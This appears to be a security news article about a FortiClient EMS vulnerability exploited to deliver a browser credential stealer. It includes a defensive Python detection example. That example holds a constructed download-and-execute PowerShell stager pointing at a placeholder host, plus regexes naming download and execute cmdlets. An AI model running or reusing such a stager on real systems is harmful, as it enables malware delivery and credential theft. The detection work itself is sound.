Cybercriminals have been actively exploiting a critical vulnerability in the FortiClient Endpoint Management Server (EMS) to spread credential-stealing malware. The flaw, which has since been patched, was misused by threat actors to disguise malware as legitimate updates.
Exploitation of FortiClient EMS Vulnerability
According to Arctic Wolf, the campaign leverages the now-patched CVE-2026-35616, which carries a CVSS score of 9.1. The flaw is a pre-authentication API access bypass that leads to privilege escalation: an unauthenticated attacker can issue requests to the EMS management API that are treated as legitimate administrative operations. Fortinet fixed it in FortiClient EMS 7.4.7; earlier 7.4 releases remain vulnerable.
Because the forged requests look like normal management traffic, the attackers could push PowerShell commands to managed endpoints through EMS itself. They used this to alter endpoint configurations, delay updates, and embed malicious scripts in Remote Access Profiles, so that the tampering was carried out by the trusted management channel rather than by a separate implant.
Malicious Use of PowerShell and FortiClient Tools
Arctic Wolf's analysis shows that the attackers relied entirely on FortiClient's own management pathways to deliver their commands. The payload was presented to endpoints as a FortiClient update and executed through PowerShell, so at first glance the activity resembled routine patch deployment.
On the endpoint, the legitimate FortiClient executable "fortitray.exe" was used to run a command script, which in turn launched a Base64-encoded PowerShell command. That command downloaded and executed the malicious payload and later sent the collected data to an attacker-controlled server. Base64 encoding hides the script from a casual look at the command line, but it is not encryption: the encoded argument decodes back to the plaintext script, which is what defenders should inspect.
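The following is an added example, not code from Arctic Wolf's report or from Fortinet, showing how a detection engineer can reverse the Base64 layer and flag the process chain described above. The log events are constructed in Sysmon Event ID 1 style; the stager script, the hostname "updates.example.invalid", and the "update.cmd" path are placeholders, not indicators from the report.

```python
import base64
import re

# Hypothetical stager, constructed for this example. It mimics the pattern
# described in the report (fetch a file named like a FortiClient patch, then
# run it); the host is a placeholder, not an indicator from the report.
STAGER_SCRIPT = (
    "Invoke-WebRequest -Uri http://updates.example.invalid/FortiEndpoint_Patch.exe "
    "-OutFile $env:TEMP\\FortiEndpoint_Patch.exe; "
    "Start-Process $env:TEMP\\FortiEndpoint_Patch.exe"
)


def encode_powershell_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {   # FortiTray.exe launching a command script: the living-off-the-land step
        "parent": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'cmd.exe /c "C:\ProgramData\update.cmd"',
    },
    {   # the command script launching hidden, Base64-encoded PowerShell
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
                   + encode_powershell_command(STAGER_SCRIPT),
    },
    {   # benign admin script: must not be flagged
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    },
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Cmdlets and .NET calls that fetch or run remote content in the decoded script.
DOWNLOAD_EXEC = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile|"
    r"Invoke-Expression|\biex\b|Start-Process|Net\.WebClient",
    re.IGNORECASE,
)
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def decode_encoded_command(cmdline: str):
    """Return the plaintext script behind an -EncodedCommand argument, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_reasons(event: dict) -> list:
    """List the indicators an event matches; an empty list means nothing of interest."""
    reasons = []
    if basename(event["parent"]) == "fortitray.exe" and basename(event["image"]) in SHELLS:
        reasons.append("fortitray.exe spawned a shell")
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        reasons.append("encoded PowerShell command")
        if DOWNLOAD_EXEC.search(script):
            reasons.append("decoded script downloads or executes content")
    if re.search(r"-w(?:indowstyle)?\s+hidden", event["cmdline"], re.IGNORECASE):
        reasons.append("hidden window")
    return reasons


def scan(events: list) -> dict:
    """Map event index to its reasons for every event matching at least one indicator."""
    return {i: suspicious_reasons(e) for i, e in enumerate(events) if suspicious_reasons(e)}
```

The decoding step matters more than the parent-child rule: a hunt that only greps command lines for "FortiEndpoint_Patch" or a URL will miss the encoded form entirely, while decoding the UTF-16LE Base64 argument exposes the download-and-execute cmdlets directly. The parent-process check is a cheap second signal, since fortitray.exe has no normal reason to launch cmd.exe or PowerShell.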
Impact and Mitigation Measures
The payload, named "FortiEndpoint_Patch.exe" to pass as a FortiClient patch, harvests sensitive data stored by web browsers, including saved passwords, session cookies, and credit card details. It has no network exfiltration capability of its own; the PowerShell script that delivered it is what sends the collected data to the attacker-controlled server.
Arctic Wolf warns that the stolen session cookies and saved credentials could give attackers access to online services and internal systems. Because a valid session cookie can be replayed without re-authenticating, this can sidestep multi-factor authentication for the affected accounts. Organizations are urged to upgrade FortiClient EMS to 7.4.7 or later, audit endpoint management configurations and Remote Access Profiles for unexpected scripts or deferred updates, and treat any credentials and sessions from affected endpoints as compromised.
The exploitation of this FortiClient EMS vulnerability underscores that endpoint management platforms are high-value targets precisely because they are trusted to run code on every managed host. Prompt patching, combined with monitoring of management traffic and of what the management agent actually executes on endpoints, remains essential in defending against attacks of this kind.
